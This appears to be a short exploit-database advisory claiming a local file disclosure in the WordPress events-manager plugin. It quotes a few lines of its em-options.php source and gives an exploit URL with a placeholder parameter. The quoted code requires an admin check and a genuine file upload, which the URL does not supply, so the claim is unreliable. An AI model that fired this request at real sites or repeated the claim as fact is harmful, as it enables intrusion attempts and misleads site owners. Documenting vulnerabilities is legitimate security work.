Wordpress Plugin events-manager - Local File Disclosure

2020.02.12
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

[-] Tile: Wordpress Plugin events-manager - Local File Disclosure [-] Author: mehran feizi [-] Category: webapps [-] Date: 2020.02.12 ============================================================================== Vulnerable page: /em-options.php =============================================================================== Vulnerable Source: 209: file_get_contents $settings = file_get_contents($_FILES['import_settings_file']['tmp_name']); requires: 206: if(!empty($_REQUEST['action']) && (($_REQUEST['action'] == 'import_em_settings' && check_admin_referer('import_em_settings')) || (is_multisite() && $_REQUEST['action'] == 'import_em_ms_settings' && check_admin_referer('import_em_ms_settings'))) && em_wp_is_super_admin ()) 208: if(!empty($_FILES['import_settings_file']['size']) && is_uploaded_file($_FILES['import_settings_file']['tmp_name'])) 4: ⇓ function em_options_save() ================================================================================= Exploit:localhost/wp-content/plugins/events-manager/admin/em-options.php?import_settings_file=[LFD] ================================================================================= contact me: telegram: @MF0584 gmail: mehranfeizi13841384@gmail.com


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top